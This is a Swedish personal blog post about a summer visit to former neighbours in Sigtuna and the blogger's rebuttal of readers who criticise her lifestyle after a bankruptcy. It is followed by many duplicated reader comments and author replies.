MITT liv, MIN vardag, MIN blogg! Du läser bara om DU vill!

Mys med ”grannarna” i Sigtuna!IMG_2520 IMG_2526 IMG_2529 IMG_2536 IMG_2537 IMG_2540 IMG_2541 IMG_2544 IMG_2546 IMG_2553 IMG_2555 IMG_2563 IMG_2567 IMG_2571 IMG_2573 Hej!

Solen skiner över Stockholm idag. Vi hade tänkt att bila ner till öland nu, på förmiddagen. Men det tar emot när vädret är på topp! 😎 Känns inte rätt att Lilleman ska behöva sitta i bilen hela dagen när det är så fint väder✨ 

Så nu ska vi gå ner till stranden, bada ett par timmar och sedan böja våran roadtripp. Igår Spenderade vi dagen i Sigtuna med våra ”grannar”. Det spelar ingen roll vart vi bor, dom kommer alltid vara våra grannar☺️

Vi hade och har en väldigt speciell relation, på ett fint sätt ❤️

Lilleman, Isabelle och Emilia spelar padda, innan maten kom in.

Strax därefter dog den😵  Då blev det tillfälligt sura miner innan dom började leka med stenar och grenar… som JAG gjorde när jag var liten  😉

Förstår mig inte på denna speltokiga värld. Lagom är bäst! 

IMG_2504 IMG_2505

 

OLYMPUS DIGITAL CAMERA
Fina Marie ❤️

IMG_2509 IMG_2510

Västerbottenpaj till Ludvig 😍

IMG_2511

Lilleman hälsade på sitt träd ”Josè”. Ett kärt återseende ☺️❤️ Ett träd som vi brukar, fika i, klättra i och njuta av utsikten över vattnet. Både vinter och sommartid. 

IMG_2574 IMG_2587

IMG_2575 IMG_2577

På kvällen grillade vi hemma i våran trädgård…. eller deras trädgård numera 😏 SÅ mysigt!

Gud vad jag saknat Sigtuna!!!!!!! OCH grannarna!❤️

IMG_2590 IMG_2593 IMG_2596 IMG_2602 IMG_2608 IMG_2616 IMG_2619

Dessa två! Marie & Julia❤️

IMG_2612

Ödet förde oss samman…. vi har haft en ”era” som alltid kommer att betyda jätte mycket.

Vänner för livet!❤️

Dom kom in i mitt liv under en väldigt mörk och tung period……..  En vänskap växte fram och vi hittade en vardag tillsammans 🌸 

Vi kommer såklart fortsätta umgås även om vi flyttat ☺️

Från våran fantastiskt mysiga gårdag i sigtuna. Till en annan sak som jag ärligt talat inte förstår mig på!?!

Vissa här inne på bloggen tycker att jag gör för mycket saker, ”hur orkar du”, ”hur har du råd” ”lugna ner dig” ”gör SI, gör SÅ”osv….

Att man ställer en fråga, eller inte har samma åsikt… det är HELT okay☺️

Men att jag ska behöva förklara mig, redovisa och be om ursäkt… Det går FET-BORT! (Ludvigs nya uttryck😂) 

jag har TRE jobb, en helvetes massa räkningar, mitt bagage och en inställning att ta mig ur situationen som jag befinner mig i efter konkurs. Jag har vänt ut och in på mig själv för att resa mig upp och komma på fötter.

Det har varit så illa att jag åkt in och ut på sjukhus, ångest, blindtarmen, sjuk… ett immunförsvar som checkade ut helt?!

Ett trasigt hjärta som bearbetat sorg i olika former. En ekonomisl situation som kräver flera jobb som hade kunnat försörja flera familjer.

Har jag gnällt? Nej. Har jag gett upp? Nej. Har jag bett om hjälp? Nej.

Jag cleanar upp min skit, kavlar upp ärmarna och gör så gott jag kan ✨👊🏻

NU har Lilleman sommarlov, vi mår BRA, vi umgås med våra vänner och njuter🙏🏻

Om vissa här inne tycker att min vardag sticker i ögonen så får det vara så…  just precis nu, är detta MIN vardag. MIN blogg. MITT liv!

Vi är inte utomlands, vi är inte iväg på någon dyr lyxsemester, (hade vi varit det så hade jag inte förklarat mig gällande det heller)

vi njuter av den svenska sommaren på ett sätt vi aldrig gjort tidigare.

Sedan 18 års ålder har jag jobbat VARJE sommar, utan semester, utan lediga helger 7 dagar i veckan! Lilleman är uppvuxen i butiken. Det var min högsäsong i min Handelsträdgård, öland var och är en säsongs-ö. Så detta för mig är helt nytt.

Jag njuter maximalt och känner mig glad, tacksam och jävligt tillfreds med att skapa fina sommarminnen för både mig och Ludvig.

Så snälla ni som med återupprepade tillfällen kommer med moralpredikan om hur jag ska leva MITT liv, skriva MIN blogg, hur jag ska vara som mamma! Det är upp till MIG! Min blogg är rak, öppen och ärlig.

Den kommer ALDRIG aldrig bli en ”happy feeling” blogg med filter av en välputsad ”perfekt” yta, som egentligen inte existerar. (För inte är väl någons liv helt perfekt?????) Det tror iallafall inte jag! 

Bloggen återspeglar MIG, min vardag och mina beslut!

Nu är det sommarlov, jag tänker fortsätta njuta, varje sekund av sommaren som är kvar!😎👊🏻

Vips så är det höst, Ludvig börjar skolan (jag också förmodligen) nytt jobb, ny vardag, nya rutiner, en massa måsten och pendling mellan stockholm och öland varannan vecka!

Gråa trista regniga dagar….. och allt annat som hösten innebär! 

Så till er som inte tycker att bloggen är vad NI vill läsa, ta en paus fram tills hösten om den irriterar er 😉

Gör bara saker som får DIG att må bra  💖

Om du sitter bakom en skärm någonstans runt om i Sverige och irriterar dig på vad jag gör och inte gör….. Skiiiiit i den! Läs inte 😂 Svårare än så är det inte! 

Vet inte hur många gånger jag skrivit detta, det ligger i LÄSARENS val, du väljer om du vill läsa eller inte. Jag kan inte välja om du ska läsa, bara du!

För dig som trivs här inne….. VARMT VÄLKOMMEN!💖

-Tack för att DU finns!

Stor kram från en glad, tillfreds och positiv tjej som för första gången på LÄNGE mår oförskämt bra!🙏🏻✨

Det låter jag ingen ta ifrån mig…. 

-BECAUSE i’m worth it!

/My Martens 

 

 

103 Komentarer

 1. He j.
  My gör vad du vill, såna människor finns alltid.
  Jag blir förvånad hur människor orkar, är de friska
  eller vad fattas de. De lägger energi på fel saker mest
  synd om dom. Olyckliga och eländiga liv måste de ha.
  Ignorera skitet ,Le och keep on shining.
  Ditt liv är värdefullt.
  Kram Linda

 2. Goa My
  Det finns ingen här som läser din blogg som har med din ekonomi att göra, den tror jag du sköter väldigt bra själv.
  Jag tycker det väldigt skönt att höra hur bra du mår
  efter allt du har gått igenom,och att det känns bra för dig att komma tillbaka till Öland som du var lite orolig över.Ha en fortsatt bra sommar ta hand om er kram

 3. Jag tycker inte att det är vi läsare som ska forma din blogg med vad du ska skriva om. Den hade ju blivit jättekonstig då ? Fortsätt att skriva som du gör ? Det är ju det som är du, ibland är det tip top och ibland mindre bra Och det är ju så livet ser ut eller….
  Sen kan jag inte förstå hur svårt det ska va o låta bli att läsa om man nu inte gillar en blogg.
  Kram ?

 4. Wow My .
  Så härligt att du får njuta av den svenska sommaren.
  Finns så många härliga platser.
  Sedan håller jag med dig om att folk inte behöver lägga sig i.
  Du får fortsätta som du gör (annars börjar jag klaga) ?
  Ha det gott .
  Kram L

 5. Hej My
  Jag har länge läst din blogg men aldrig skrivit innan men nu känner jag att jag vill det. Du är helt fantastisk! Menar verkligen det. Sådan fin mamma och så öppen och ärlig. Du har helt klart den bästa bloggen❤. Du ger energi och skratt plus mycket inspiration och du är otroligt modig som få❤. Fortsätt så det är många som aldrig skulle våga göra allt du gör och vara så öppen med sitt liv❤. Du är unik❤
  Stor kram Maja

 6. Hej!
  Jag har aldrig kommenterat förut.
  Men läser den varje dag!!
  Fortsätt och gör det som får dig att må bra, du är en sann inspiratör.
  Lycka till på livet stig!!

 7. He j.

  My gör vad du vill, såna människor finns alltid.
  Jag blir förvånad hur människor orkar, är de friska
  eller vad fattas de. De lägger energi på fel saker mest
  synd om dom. Olyckliga och eländiga liv måste de ha.
  Ignorera skitet ,Le och keep on shining.

  Ditt liv är värdefullt.

  Kram Linda

 8. Goa My
  Det finns ingen här som läser din blogg som har med din ekonomi att göra, den tror jag du sköter väldigt bra själv.
  Jag tycker det väldigt skönt att höra hur bra du mår
  efter allt du har gått igenom,och att det känns bra för dig att komma tillbaka till Öland som du var lite orolig över.Ha en fortsatt bra sommar ta hand om er kram

 9. Jag tycker inte att det är vi läsare som ska forma din blogg med vad du ska skriva om. Den hade ju blivit jättekonstig då 😄 Fortsätt att skriva som du gör 🌺 Det är ju det som är du, ibland är det tip top och ibland mindre bra Och det är ju så livet ser ut eller….
  Sen kan jag inte förstå hur svårt det ska va o låta bli att läsa om man nu inte gillar en blogg.
  Kram 💕

 10. Wow My .
  Så härligt att du får njuta av den svenska sommaren.
  Finns så många härliga platser.
  Sedan håller jag med dig om att folk inte behöver lägga sig i.
  Du får fortsätta som du gör (annars börjar jag klaga) 😊

  Ha det gott .
  Kram L

 11. Hej My
  Jag har länge läst din blogg men aldrig skrivit innan men nu känner jag att jag vill det. Du är helt fantastisk! Menar verkligen det. Sådan fin mamma och så öppen och ärlig. Du har helt klart den bästa bloggen❤. Du ger energi och skratt plus mycket inspiration och du är otroligt modig som få❤. Fortsätt så det är många som aldrig skulle våga göra allt du gör och vara så öppen med sitt liv❤. Du är unik❤

  Stor kram Maja

 12. Hej!
  Jag har aldrig kommenterat förut.
  Men läser den varje dag!!
  Fortsätt och gör det som får dig att må bra, du är en sann inspiratör.
  Lycka till på livet stig!!

 13. Jag trivs alldeles utmärkt här hos dig & på din blogg!!!❤?❤?❤?❤Och jag blir glad i hjärtat av att läsa att DU är glad & mår bra!!!! Fortsätt njuta och vara Lycklig!!!!!???

 14. Ja jag fattar inte heller tjatandet om att du bara skriver om nöjen.
  Skulle säga att din blogg är riktigt välbalanserad av vardag, nöjen, skratt och gråt. Precis som livet är. Ibland gör man det ena och ibland det andra. Blir man stressad av att läsa om andras roligheter så kommer här ett revolutionerande tips: Stäng av den apparat du tittar på!! ? Känns omgivningen fortfarande för
  spännande så kan du sätta dig och titta på kaffe som rinner ner genom kaffebryggaren, så känner du dig garanterat lugnare efter en sådär 8-10 koppar.
  I den här världen finns helt klart människor som hugger på allt. En kobra förefaller långsam i jämförelse med här människornas giftiga attacker. Inget att bry sig om, för det fina i kråksången är att man själv kan välja om man lyssnar på dem eller inte. Och man väljer självklart inte! ?. Kram!

 15. Så gott att ni fick träffa goa grannarna. Hur det än är och man flyttar etc så har man ändå vissa vänner och grannar i sitt hjärta, även om man önskar att de fanns ’fysiskt’ i vardagen oxå. Ha en fin augusti hälsar Helene

 16. Vill bara säga, DU ÄR SÅ J*VLA BRA ? Du är grym på alla sätt, skriv DIN blogg så som DU vill. Det har du rätt till. Ingen ska komma och säga att man ska göra si eller så.
  Nu har jag sagt det ?
  Kramar från en mamma på västkusten

 17. Herregud va e det m folk ?. Såå tröttsamt. Tycker det e helt rätt å njuta av sommaren när du nu för en gång skull har kunnat det.
  Tycker du verkar vara en varm å fin människa. Ha det så gott . Kram

 18. ???Bra My att du säger ifrån. Att läsa bloggen e helt frivilligt. Jag tycker det är lycka att se Lilleman o dig tillsammans o ni verkar ha så kul och att ni mår bra, för vi som följt dig, vet hur dåligt du mått. Så självklart ska ni skapa minnen. Tids nog kommer vardagen tbx. Kram o var rädda om varandra❤️

 19. My!
  Fortsätt skriv ? älskar din blogg. Tycker väldigt mkt om dig. Du e en så människa.
  Puss Martin❤️❤️❤️❤️

 20. Jag trivs alldeles utmärkt här hos dig & på din blogg!!!❤💓❤💓❤💓❤Och jag blir glad i hjärtat av att läsa att DU är glad & mår bra!!!! Fortsätt njuta och vara Lycklig!!!!!😍😍😍

 21. Ja jag fattar inte heller tjatandet om att du bara skriver om nöjen.
  Skulle säga att din blogg är riktigt välbalanserad av vardag, nöjen, skratt och gråt. Precis som livet är. Ibland gör man det ena och ibland det andra. Blir man stressad av att läsa om andras roligheter så kommer här ett revolutionerande tips: Stäng av den apparat du tittar på!! 🙂 Känns omgivningen fortfarande för
  spännande så kan du sätta dig och titta på kaffe som rinner ner genom kaffebryggaren, så känner du dig garanterat lugnare efter en sådär 8-10 koppar.
  I den här världen finns helt klart människor som hugger på allt. En kobra förefaller långsam i jämförelse med här människornas giftiga attacker. Inget att bry sig om, för det fina i kråksången är att man själv kan välja om man lyssnar på dem eller inte. Och man väljer självklart inte! :). Kram!

 22. Så gott att ni fick träffa goa grannarna. Hur det än är och man flyttar etc så har man ändå vissa vänner och grannar i sitt hjärta, även om man önskar att de fanns ’fysiskt’ i vardagen oxå. Ha en fin augusti hälsar Helene

 23. Vill bara säga, DU ÄR SÅ J*VLA BRA 🙂 Du är grym på alla sätt, skriv DIN blogg så som DU vill. Det har du rätt till. Ingen ska komma och säga att man ska göra si eller så.
  Nu har jag sagt det 🙂
  Kramar från en mamma på västkusten

 24. Herregud va e det m folk 😥. Såå tröttsamt. Tycker det e helt rätt å njuta av sommaren när du nu för en gång skull har kunnat det.
  Tycker du verkar vara en varm å fin människa. Ha det så gott . Kram

 25. Det är just därför din blogg är min favoritblogg och faktiskt den enda blogg jag läser numera. För man märker så tydligt att 100 % av dina ord kommer direkt från ditt hjärta och utan filter. Man får helt enkelt sanningen direkt från hjärtat exakt hur den är. Och det får man faktiskt inte på något annat ställe på hela Internet. Nej, jag överdriver inte ? Jag har läst mängder med bloggar och sociala medier genom åren och man märker DIREKT när något är tillrättalagt och en fasad. Det ”skaver” liksom i kanterna när man läser. Det flyter liksom inte på som det ska. När man pratar direkt från hjärtat och visar upp ett liv utan filter då flyter det ju på på ett väldigt naturligt sätt. Men när något är tillrättalagt och en fasad då hackar det liksom lite i kanterna istället. Svårt att förklara ? men det märks väldigt tydligt. Och det är så det är precis överallt var man än läser. Det hackar i kanterna. Du har den enda bloggen där varje ord är naturligt.

 26. 👍👊🏻Bra My att du säger ifrån. Att läsa bloggen e helt frivilligt. Jag tycker det är lycka att se Lilleman o dig tillsammans o ni verkar ha så kul och att ni mår bra, för vi som följt dig, vet hur dåligt du mått. Så självklart ska ni skapa minnen. Tids nog kommer vardagen tbx. Kram o var rädda om varandra❤️

 27. My!
  Fortsätt skriv 🙂 älskar din blogg. Tycker väldigt mkt om dig. Du e en så människa.
  Puss Martin❤️❤️❤️❤️

 28. Hahaha nyss var du för gnällig ??? å nu är du för nöjd å glad ??? spelar ingen roll vad du skriver om vissa blir aldrig nöjda för det handlar ej om dig det handlar om att dom själv mår dåligt ? underbart att livet e bättre nu ? skit i gnällspikarna ?? kram ?

 29. Fick inte med allt. Jag får också höra sånt ”Hur har du råd”, ”Lugna ner dig” osv. Jag fattar inte varför folk har åsikter om hur andra människor lever sina liv. Jag skulle aldrig ens komma på tanken att säga åt andra hur dom ska leva eller inte. Vissa människor tycker om att ha fullt upp och göra saker hela tiden och andra människor tycker om att ta det lugnare. Människor är olika. Låt alla göra det dom blir lyckliga av!! Och är det inte märkligt att man endast frågar en ensamstående mamma hur hon har råd. För inte fan har man någonsin hört någon fråga där dom är två föräldrar och reser utomlands för minst 50.000 hit och dit hur dom har råd. Familjer där dom är två vuxna och där dom gör saker hela tiden och reser konstant och strör pengar runt sig dom får minsann inga frågor om ekonomin. Varför skulle en ensamstående mamma inte ha råd? Dom jobbar väl dom också? Dom jobbar väl med samma jobb som alla andra? Dom är ju dessutom bara 1 vuxen och därmed blir det billigare med resor, inträden, restauranger och allting när det bara är 1 vuxen och inte 2. Sen prioriterar man olika. Vissa lägger en förmögenhet på saker, andra kanske inte köper en massa saker utan köper en resa istället. Vissa äter ute varje dag, andra kanske lagar mat hemma. Vissa strör pengar runt sig och gör småköp konstant, andra kanske sparar istället osv. Tänk om folk kunde sköta sitt eget liv istället för alla andras!

 30. Det är just därför din blogg är min favoritblogg och faktiskt den enda blogg jag läser numera. För man märker så tydligt att 100 % av dina ord kommer direkt från ditt hjärta och utan filter. Man får helt enkelt sanningen direkt från hjärtat exakt hur den är. Och det får man faktiskt inte på något annat ställe på hela Internet. Nej, jag överdriver inte 🙂 Jag har läst mängder med bloggar och sociala medier genom åren och man märker DIREKT när något är tillrättalagt och en fasad. Det ”skaver” liksom i kanterna när man läser. Det flyter liksom inte på som det ska. När man pratar direkt från hjärtat och visar upp ett liv utan filter då flyter det ju på på ett väldigt naturligt sätt. Men när något är tillrättalagt och en fasad då hackar det liksom lite i kanterna istället. Svårt att förklara 🙂 men det märks väldigt tydligt. Och det är så det är precis överallt var man än läser. Det hackar i kanterna. Du har den enda bloggen där varje ord är naturligt.

 31. Hahaha nyss var du för gnällig 😁😀😊 å nu är du för nöjd å glad 😃😁😀 spelar ingen roll vad du skriver om vissa blir aldrig nöjda för det handlar ej om dig det handlar om att dom själv mår dåligt 😨 underbart att livet e bättre nu 😀 skit i gnällspikarna 😁😀 kram 💖

 32. Fick inte med allt. Jag får också höra sånt ”Hur har du råd”, ”Lugna ner dig” osv. Jag fattar inte varför folk har åsikter om hur andra människor lever sina liv. Jag skulle aldrig ens komma på tanken att säga åt andra hur dom ska leva eller inte. Vissa människor tycker om att ha fullt upp och göra saker hela tiden och andra människor tycker om att ta det lugnare. Människor är olika. Låt alla göra det dom blir lyckliga av!! Och är det inte märkligt att man endast frågar en ensamstående mamma hur hon har råd. För inte fan har man någonsin hört någon fråga där dom är två föräldrar och reser utomlands för minst 50.000 hit och dit hur dom har råd. Familjer där dom är två vuxna och där dom gör saker hela tiden och reser konstant och strör pengar runt sig dom får minsann inga frågor om ekonomin. Varför skulle en ensamstående mamma inte ha råd? Dom jobbar väl dom också? Dom jobbar väl med samma jobb som alla andra? Dom är ju dessutom bara 1 vuxen och därmed blir det billigare med resor, inträden, restauranger och allting när det bara är 1 vuxen och inte 2. Sen prioriterar man olika. Vissa lägger en förmögenhet på saker, andra kanske inte köper en massa saker utan köper en resa istället. Vissa äter ute varje dag, andra kanske lagar mat hemma. Vissa strör pengar runt sig och gör småköp konstant, andra kanske sparar istället osv. Tänk om folk kunde sköta sitt eget liv istället för alla andras!

 33. Hej My!! Tycker att du gör helt rätt att du njuter av sommaren och gör det du känner för, det är du värd efter allt slit!! Sen har vi alltid människor som inte har ett ”eget” liv så de måste kommentera andras i slut änden är det nog dom som mår sämst, borsta bort sådana ”energitjuvar”.
  NJUT!!! Kram

 34. Hej My!! Tycker att du gör helt rätt att du njuter av sommaren och gör det du känner för, det är du värd efter allt slit!! Sen har vi alltid människor som inte har ett ”eget” liv så de måste kommentera andras. I slut änden är det nog dom som mår sämst, borsta bort sådana ”energitjuvar”.
  NJUT!!! Kram

 35. Hej!
  Skrev inte du när din konkurs kom att du inte hade några skulder att betala???
  Om du inte har skulder behöver du väll inte ha tre jobb??
  Så härligt med Öland, där är så fint.
  Kramar

  • Det fanns inga lev skulder, inga skatteskulder, inget näringsförbud. Jag personligen tog smällen….. jag gjorde rätt för mig till ALLA andra. Resten ska jag nu betala av, med mina TRE jobb och en massa j*vlar anammat!

 36. Älskade My! Du är en fantastisk person, mamma, vän och granne. Tack för en underbar dag och kväll igår❤️ Även fast du och Lilleman inte bor fysiskt kvar hos oss här i Sigtuna så bor ni för alltid i vora hjärtan. Ni är redan saknade men med vetskapen att en stark vänskap vuxit fram så känns det ändå okej. Du är BÄST och fortsätt vara DU. Love you babe?❤️

 37. Toppen My att du säger ifrån till alla dessa
  ” förståsigpåare” som vet hur livet INTE ska levas…
  Njut du och din härliga kille av er sommarledighet tillsammans det är ni värda. Man kan ha mycket roligt genom att umgås med familj och goda vänner och det kostar bara tid och kärlek, det saknar nog de som klagar. Jag tycker du är enastående som kämpar på i livet och försöker reda ut dina dilemman. Ha en underbar ledighet och hoppas verkligen du kommer trivas på ”öa”.
  Skit i alla pessimister och gläds åt livet och din lilla kille, han växer fort och snart hittar han egna äventyr som mamma inte får vara med på. Kram och lycka till önskar en utflyttad ”08:a” som hittat sin värld i Småland !

 38. Fina My. Fortsätt och lev ditt liv precis som Du vill. ?För det är det som är det finurliga här i livet. Vi fick ett liv var och var och en gör precis som man vill med sitt liv. ? fortsätt vara Du för det finns bara en av dig . Många kramar från Sara?

 39. Såå bra skrivet! Fattar inte vad det är för fel på dessa människor som lägger sig i.De måste vara så bittra på sina egna liv..eller? Skulle vara intressant att veta varför de skriver så elaka kommentarer och om de går och säger elaka saker till människor face to face! Ha en fortsatt trevlig sommar My ?Alexandra.

 40. Hej My!! Tycker att du gör helt rätt att du njuter av sommaren och gör det du känner för, det är du värd efter allt slit!! Sen har vi alltid människor som inte har ett ”eget” liv så de måste kommentera andras i slut änden är det nog dom som mår sämst, borsta bort sådana ”energitjuvar”.
  NJUT!!! Kram

 41. Hej My!! Tycker att du gör helt rätt att du njuter av sommaren och gör det du känner för, det är du värd efter allt slit!! Sen har vi alltid människor som inte har ett ”eget” liv så de måste kommentera andras. I slut änden är det nog dom som mår sämst, borsta bort sådana ”energitjuvar”.
  NJUT!!! Kram

 42. Hej!
  Skrev inte du när din konkurs kom att du inte hade några skulder att betala???
  Om du inte har skulder behöver du väll inte ha tre jobb😳?
  Så härligt med Öland, där är så fint.
  Kramar

  • Det fanns inga lev skulder, inga skatteskulder, inget näringsförbud. Jag personligen tog smällen….. jag gjorde rätt för mig till ALLA andra. Resten ska jag nu betala av, med mina TRE jobb och en massa j*vlar anammat!

 43. Älskade My! Du är en fantastisk person, mamma, vän och granne. Tack för en underbar dag och kväll igår❤️ Även fast du och Lilleman inte bor fysiskt kvar hos oss här i Sigtuna så bor ni för alltid i vora hjärtan. Ni är redan saknade men med vetskapen att en stark vänskap vuxit fram så känns det ändå okej. Du är BÄST och fortsätt vara DU. Love you babe😘❤️

 44. Toppen My att du säger ifrån till alla dessa
  ” förståsigpåare” som vet hur livet INTE ska levas…
  Njut du och din härliga kille av er sommarledighet tillsammans det är ni värda. Man kan ha mycket roligt genom att umgås med familj och goda vänner och det kostar bara tid och kärlek, det saknar nog de som klagar. Jag tycker du är enastående som kämpar på i livet och försöker reda ut dina dilemman. Ha en underbar ledighet och hoppas verkligen du kommer trivas på ”öa”.
  Skit i alla pessimister och gläds åt livet och din lilla kille, han växer fort och snart hittar han egna äventyr som mamma inte får vara med på. Kram och lycka till önskar en utflyttad ”08:a” som hittat sin värld i Småland !

 45. Fina My. Fortsätt och lev ditt liv precis som Du vill. 😚För det är det som är det finurliga här i livet. Vi fick ett liv var och var och en gör precis som man vill med sitt liv. 😄 fortsätt vara Du för det finns bara en av dig . Många kramar från Sara💕

 46. Såå bra skrivet! Fattar inte vad det är för fel på dessa människor som lägger sig i.De måste vara så bittra på sina egna liv..eller? Skulle vara intressant att veta varför de skriver så elaka kommentarer och om de går och säger elaka saker till människor face to face! Ha en fortsatt trevlig sommar My 😊Alexandra.

 47. Du skriver väl precis vad du vill men oavsett vad så är ditt liv väldigt fjärran från hur de flesta ensamstående lever, som ska lämna ungar på dagis/skola för att sen kanske gå till ett jobb från 7 till 4 eller kanske jobba skift inom vården.
  Inte därmed sagt att det är fel, men kanske är det därför du har så många läsare. Det blir nån form av ”verklighetsflykt”, en helt annan värld.
  Du har din blogg och det är ju ditt liv och naturligtvis skriver du precis vad du vill.
  Men du behöver ju inte gå i taket om nån ifrågasätter eller undrar.
  För i ärlighetens namn är det ju väldans mycket aktiviteter varje gång du har din son, inte bara de här dagarna på sommaren.
  Kanske stör det folk bara för det jag just skriver, att det är ett så helt annorlunda liv än andras
  Många har knappt råd ta sina ungar till en picnic eller en utflykt för det finns inte pengar till det.
  Du får se andra sidan också, självklart kan de sluta läsa din blogg, men nog tror jag du vill ha läsare kvar

  • Jag har inte gått i taket ??? även om det för dig och flera andra skulle känns som EM verklighetsflykt så är det precis så som min vardag ser ut ☺️ Ekonomin….. ja den ser alltid olika ut. Der är upp till var och en hur man prioriterar, hur mycket man satsar, om mam överhuvdtaget har det driver som jag själv har…. jag vet ingenting annat. Jag har levt själv och jobbar heltid sedan 14 års ålder. Jag vet hur det är att ha ingenting, varken mat eller bostad. Jag vet också hur det är att ”lyckas”attha det mer än bra……. jag krigar för att vända min situation, varje dag…… det är långtifrån alla som skulle gjort. Rätt eller fel, det är så jag fungerar ☺️

 48. Du skriver väl precis vad du vill men oavsett vad så är ditt liv väldigt fjärran från hur de flesta ensamstående lever, som ska lämna ungar på dagis/skola för att sen kanske gå till ett jobb från 7 till 4 eller kanske jobba skift inom vården.
  Inte därmed sagt att det är fel, men kanske är det därför du har så många läsare. Det blir nån form av ”verklighetsflykt”, en helt annan värld.
  Du har din blogg och det är ju ditt liv och naturligtvis skriver du precis vad du vill.
  Men du behöver ju inte gå i taket om nån ifrågasätter eller undrar.
  För i ärlighetens namn är det ju väldans mycket aktiviteter varje gång du har din son, inte bara de här dagarna på sommaren.
  Kanske stör det folk bara för det jag just skriver, att det är ett så helt annorlunda liv än andras
  Många har knappt råd ta sina ungar till en picnic eller en utflykt för det finns inte pengar till det.
  Du får se andra sidan också, självklart kan de sluta läsa din blogg, men nog tror jag du vill ha läsare kvar

  • Jag har inte gått i taket 😂😂😂 även om det för dig och flera andra skulle känns som EM verklighetsflykt så är det precis så som min vardag ser ut ☺️ Ekonomin….. ja den ser alltid olika ut. Der är upp till var och en hur man prioriterar, hur mycket man satsar, om mam överhuvdtaget har det driver som jag själv har…. jag vet ingenting annat. Jag har levt själv och jobbar heltid sedan 14 års ålder. Jag vet hur det är att ha ingenting, varken mat eller bostad. Jag vet också hur det är att ”lyckas”attha det mer än bra……. jag krigar för att vända min situation, varje dag…… det är långtifrån alla som skulle gjort. Rätt eller fel, det är så jag fungerar ☺️

 49. En fråga My detta liv du lever nu kom väl genom att du blev känd genom att du var med i ensam mamma söker. Jag bryr mig inte om din ekonomi eller hur du lever ditt liv. Lycka till och ha det nu så bra med allt du väljer att hitta på ?

   • En fråga i all välmening, hur kom du i kontakt med Anna Book och all de andra kändisar som du visar upp på bloggen? Det handlar bara om ren nyfikenhet och inte om avundsjuka eller liknande.

    • Anna lärde jag känna gör 3-4 år sedan, vi gjorde ett jobb tillsammans, sedan modevisning, tjejmiddagar osv…. hur man ser på detta med ”kändisar” eller inte. Det är för mig en gåta. Det är mina vänner, oavsett vad dom jobbar med. Tillfällen där vi är många i mediabranschen per automatik sätts ihop på olika jobb, event osv.. det händer naturligtvis. Vissa klickar man med, andra inte. Visa får ni se på bloggen… andra inte ☺️

     • Vad är det du arbetar med egentligen, berätta gärna. Du säger att du har tre arbeten, vilka är dessa och vad innebär det, vad gör du? Hur länge har du haft dessa tre arbeten och hur länge kommer du att ha dessa. Vad har du för utbildning?

 50. En fråga My detta liv du lever nu kom väl genom att du blev känd genom att du var med i ensam mamma söker. Jag bryr mig inte om din ekonomi eller hur du lever ditt liv. Lycka till och ha det nu så bra med allt du väljer att hitta på 🙂

   • En fråga i all välmening, hur kom du i kontakt med Anna Book och all de andra kändisar som du visar upp på bloggen? Det handlar bara om ren nyfikenhet och inte om avundsjuka eller liknande.

    • Anna lärde jag känna gör 3-4 år sedan, vi gjorde ett jobb tillsammans, sedan modevisning, tjejmiddagar osv…. hur man ser på detta med ”kändisar” eller inte. Det är för mig en gåta. Det är mina vänner, oavsett vad dom jobbar med. Tillfällen där vi är många i mediabranschen per automatik sätts ihop på olika jobb, event osv.. det händer naturligtvis. Vissa klickar man med, andra inte. Visa får ni se på bloggen… andra inte ☺️

     • Vad är det du arbetar med egentligen, berätta gärna. Du säger att du har tre arbeten, vilka är dessa och vad innebär det, vad gör du? Hur länge har du haft dessa tre arbeten och hur länge kommer du att ha dessa. Vad har du för utbildning?

 51. Det är klart att du är värd att må bra och njuta av sommaren, det är alla värda men alla har inte samma möjligheter. Men vad jag inte förstår är varför du, så fort någon skriver att du har det bra eller lyxigt, måste skriva om att du har minsann haft det tufft och jobbat så mycket, det är som om du har ett behov av att man ska tycka synd om dig. Tror tyvärr det uppfattas av många som tjatigt och patetiskt, missförstå mig rätt. Och inte har du väl jobbat 7 dagar i veckan hela året runt sen du var 18? Lite ledigt har du väl ändå haft, förrförra sommaren njöt du en del i Sthlm och du var i Ystad och du har ju även varit på en del utlandsresor genom åren, men förstår att det är första hela sommaren ledig för dig förutom bloggen då som jag förstår är en bra inkomst o kräver en del jobb men ändå att det är mer fritt. Men du skriver TRE jobb!? Har jag helt missat, trodde du bara jobbade med blogg nu så undrar vad är det för tre jobb du har nu? Fortsatt trevlig sommar, skriv o gör vad du vill och fortsätt njut!

 52. Det är klart att du är värd att må bra och njuta av sommaren, det är alla värda men alla har inte samma möjligheter. Men vad jag inte förstår är varför du, så fort någon skriver att du har det bra eller lyxigt, måste skriva om att du har minsann haft det tufft och jobbat så mycket, det är som om du har ett behov av att man ska tycka synd om dig. Tror tyvärr det uppfattas av många som tjatigt och patetiskt, missförstå mig rätt. Och inte har du väl jobbat 7 dagar i veckan hela året runt sen du var 18? Lite ledigt har du väl ändå haft, förrförra sommaren njöt du en del i Sthlm och du var i Ystad och du har ju även varit på en del utlandsresor genom åren, men förstår att det är första hela sommaren ledig för dig förutom bloggen då som jag förstår är en bra inkomst o kräver en del jobb men ändå att det är mer fritt. Men du skriver TRE jobb!? Har jag helt missat, trodde du bara jobbade med blogg nu så undrar vad är det för tre jobb du har nu? Fortsatt trevlig sommar, skriv o gör vad du vill och fortsätt njut!

 53. Ja du My, jag vet faktiskt inte hur du har levt innan konkurs o grejer. Jag vet bara hur du levt efter. Jag vet om att du varit med i ” ensam mamma söker” DET måste ha varit kul! De flesta här inne på din blogg förstår ju o hejar på dig, MEN som Irving säger så finns det några människor som inte har så mycket erfarenhet av livet( tror jag) skriver här om ditten o datten hur du ska bete dig o leva m.m
  OM dom bara visste hur jäkla bra du är, eller kanske inte bra , utan bara bjuder på din vardag i din blogg som få består av mänsklighet!!!!!!! Tack My för att jag fortsatt får läsa din blogg o faktiskt få känna igen mig ibland;)

 54. Ja du My, jag vet faktiskt inte hur du har levt innan konkurs o grejer. Jag vet bara hur du levt efter. Jag vet om att du varit med i ” ensam mamma söker” DET måste ha varit kul! De flesta här inne på din blogg förstår ju o hejar på dig, MEN som Irving säger så finns det några människor som inte har så mycket erfarenhet av livet( tror jag) skriver här om ditten o datten hur du ska bete dig o leva m.m

  OM dom bara visste hur jäkla bra du är, eller kanske inte bra , utan bara bjuder på din vardag i din blogg som få består av mänsklighet!!!!!!! Tack My för att jag fortsatt får läsa din blogg o faktiskt få känna igen mig ibland;)

 55. Hej! Hittade nyss hit. Tänkte hänga kvar ett tag ? Ni ser ut att ha haft det riktigt bra!
  Håller med dig, bara att läsa nåt annat om man inte gillar det…

